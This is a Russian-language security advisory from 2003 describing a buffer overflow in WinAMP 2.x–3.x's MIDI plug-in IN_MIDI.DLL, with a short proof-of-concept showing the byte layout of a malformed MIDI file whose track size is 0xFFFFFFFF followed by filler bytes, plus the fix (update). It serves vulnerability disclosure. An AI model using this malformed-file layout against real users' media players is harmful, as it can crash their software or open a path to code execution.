Переполнение буфера в WinAMP при проигрывании MIDI файлов

Дата публикации:
10.09.2003
Всего просмотров:
1014
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
WinAMP 3.x
WinAMP 2.x

Уязвимые версии: WinAMP 2.x-3

Описание: Переполнение буфера обнаружено в WinAMP при проигрывании MIDI файлов. Атакующий может выполнить произвольный код на системе пользователя.

Уязвимость связанна с проверкой границ в MIDI plug-in "IN_MIDI.DLL" при обработке MIDI файлов. Переполнение происходит при обработке MIDI файла со значением "Track data size" равным "0xFFFFFFFF".

Пример/Эксплоит:

 
4 bytes  MIDI Header       "MThd"
4 bytes  Header data size  00000006
2 bytes  Format            0000
2 bytes  Number of tracks  0001
2 bytes  Divisions         0001
4 bytes  Track Header      "MTrk"
4 bytes  Track data size   ffffffff  <---  bug
...      "aaaaaaaaaaaaaaaaaaaaa..."  <---  fun

URL производителя:http://www.winamp.com

Решение:

Установите обновленную версию программы. Используйте альтернативное программное обеспечение.

Ссылки: Winamp 2.91 lets code execution through MIDI files
или введите имя

CAPTCHA